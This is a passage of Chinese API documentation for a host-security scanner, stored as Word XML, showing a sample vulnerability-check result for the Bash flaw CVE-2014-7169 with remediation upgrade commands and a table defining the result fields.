        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "desc": "GNU Bash 存在安全漏洞，该漏洞源于GNU Bash 允许在环境变量的值中的函数定义，及在函数定义后加入额外的字符串，攻击者可利用此特性在远程写入文件或执行其他可以影响到系统的操作。如涉及ForceCommand功能的向量所示OpenSSH sshd，Apache HTTP Server中的mod_cgi和mod_cgid模块，由未指定的DHCP客户端执行的脚本，以及在Bash执行的特权边界内设置环境的其他情况。由于CVE-2014-6271的修复程序不完整，因此存在此漏洞。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "restartOpts": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "publicDate": "2014-09-24 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "firstCheckTime": "2019-05-20 01:30:23",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "family": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "severity": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "checkInfo": "版本比对检测原理：检查当前系统中Bash版本是否在受影响版本内|版本比对检测结果：- bash\r\n  当前安装版本：3.2-24.el5\r\n  漏洞修复版本：3.2-33.el5_11.4\r\n该主机存在此漏洞|POC检测原理：检查当前系统中Bash版本是否在受影响版本内|POC检测结果：当前主机存在漏洞，在/dev/shm目录中发现Poc生成的文件/dev/shm/QT_Test_1558287004",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pocCheckInfo": "bash官方在修复CVE-2014-6271漏洞时，由于考虑情况不全，导致漏洞修复可以被绕过，从而致使新的漏洞出现。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "checkResult": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": "{\"code\": 0, \"execute_type\": 3, \"cve_id\": \"CVE-2014-7169\", \"poc_check_result\": {\"vuln\": 1, \"code\": 0, \"result\": {\"vuls\": [{\"msg\": \"\\u5b58\\u5728\\u6f0f\\u6d1e\", \"vuln\": true, \"info\": \"\\u5728/dev/shm\\u76ee\\u5f55\\u4e2d\\u53d1\\u73b0Poc\\u751f\\u6210\\u7684\\u6587\\u4ef6/dev/shm/QT_Test_1558287004\"}]}, \"error\": \"\"}, \"host_id\": \"24b7d45d8095b846\", \"ver_check_result\": {\"vuln\": 1, \"code\": 0, \"result\": {\"vuls\": [{\"code\": 1, \"version\": \"3.2-24.el5\", \"fix_version\": \"3.2-33.el5_11.4\", \"name\": \"bash\"}]}, \"error\": \"\"}}",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remedDescription": "升级bash到最新版本，漏洞修复后需要重启bash服务，建议业务不繁忙时修复。使用以下命令升级：   \r\nRHEL/CentOS : sudo yum update -y bash \r\nUbuntu : sudo apt-get update &amp;&amp; sudo apt-get install --only-upgrade -y bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "kernel": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remote": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "localEscalation": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "hasExp": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hasPoc": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cvss": "AV:N/AC:L/Au:N/C:C/I:C/A:C",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cvssScore": 10,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "refs": "CNVD-2014-06435,BID-70137",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "expRefs": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pocRefs": "https://www.exploit-db.com/exploits/34879/\r\nhttps://www.exploit-db.com/exploits/36503/\r\nhttps://www.exploit-db.com/exploits/36504/\r\nhttps://www.exploit-db.com/exploits/35115/\r\nhttps://www.exploit-db.com/exploits/34766/\r\nhttps://www.exploit-db.com/exploits/36609/\r\nhttps://www.exploit-db.com/exploits/35146/\r\nhttps://www.exploit-db.com/exploits/34765/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cves": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "CVE-2014-7169"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "category": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        8</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "condition": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "appVersion": "bash＜4.3\r\n (不同操作系统影响的应用版本不同，具体以检测结果为准)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pocCheckResults": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "checkResult": "- bash\r\n  当前安装版本：3.2-24.el5\r\n  漏洞修复版本：3.2-33.el5_11.4\r\n该主机存在此漏洞"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "executeType": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "checkResult": "当前主机存在漏洞，在/dev/shm目录中发现Poc生成的文件/dev/shm/QT_Test_1558287004"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506FB6D3"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910"/>
        <w:gridCol w:w="1072"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6D20C0B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8C5A8FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01F13182" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D04E6CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6016FE25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="779225E6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C8DD5D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08517D23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="393A6E00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="119AB804" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险id（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B08A354" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC4EE74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69FCA264" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BEED6C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B190B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险名（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="45EDA534" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="356E9CDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F84B1D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50A739A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A5ABC11" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>影响的应用（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F90E194" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E78B3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>desc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D58AB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C374302" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F1263F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05464675" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="042ABA1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7632D215" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B270E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A14E50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复影响：0-未知；1-无需重启；2-服务重启；3系统重启 （仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41131DE3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74099F7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>publicDate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303865F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EAC6967" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="375488DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>发布时间（仅linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4B846956" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="156E6FA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48BCFEA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="158228FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D6AF6A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>首次检测时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0784BE89" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C9E2D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="290FD002" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EABB344" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C093009" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险类型，对于漏洞检测固定为4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CCC050E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A8E4B97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FF68DB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A75F41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FFDF5D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>危险程度：0-信息；1-低危；2-中危；3-高危；4-危急 ）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="791AA0DD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79EABCEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5E68D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69E83E64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DAE7712" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D332FA2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D9A2863" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pocCheckInfo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E0C193B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6130E045" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B18B060" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>POC检测信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70D53FF9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FB7551B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1748E55F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62942AF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6940AA61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>验证结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C361C23" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40043383" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C38EC66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED1EDA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46970F63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>详情，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="附录3-linux漏洞检测-查询结果-data数据结构">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>附录3</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5780330B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E23605" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remedDescription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B3F2659" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30AEF794" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="435CBB09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1BA0739F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C33009D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hasExp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAB7C25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
